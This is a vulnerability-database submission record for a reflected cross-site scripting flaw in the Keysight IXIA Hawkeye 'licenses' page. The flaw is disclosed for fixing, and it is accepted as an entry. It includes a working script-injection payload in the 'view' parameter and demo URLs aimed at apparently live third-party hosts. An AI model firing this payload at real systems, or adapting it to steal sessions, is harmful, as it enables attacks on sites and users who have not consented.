| Title | Reflected XSS - Hawkeye framework |
|---|---|
| Description | When accessing the URL, we are redirected to a screen that has a hyperlink "licenses"; when accessing this directory and entering `licenses?view=teste"><script>alert(%27c4ng4c3ir0%27)</script>`, the alert is displayed in the browser.
Vulnerable Resource: Hawkeye framework
Version x.x.x.x, Copyright © 2023, IXIA | IXIA Hawkeye, 25 Endpoint Solution Bundle
Demo URLs:
http://www.ghome2.com/licenses?view=teste%22%3E%3Cscript%3Ealert(%27c4ng4c3ir0%27)%3C/script%3E
https://hawkeye.cb-es.comcast.com/licenses?view=teste%22%3E%3Cscript%3Ealert(%27c4ng4c3ir0%27)%3C/script%3E
If the alert does not appear, access the URL again, as apparently it is necessary to receive a cookie from the application for it to work. |
| User | c4ng4c3ir0 (UID 38456) |
| Submission | 2023-03-24 05:39 PM (3 years ago) |
| Moderation | 2023-04-05 08:32 AM (12 days later) |
| Status | Accepted |
| VulDB Entry | 224998 [Keysight IXIA Hawkeye 3.3.16.28 /licenses view cross site scripting] |
| Points | 17 |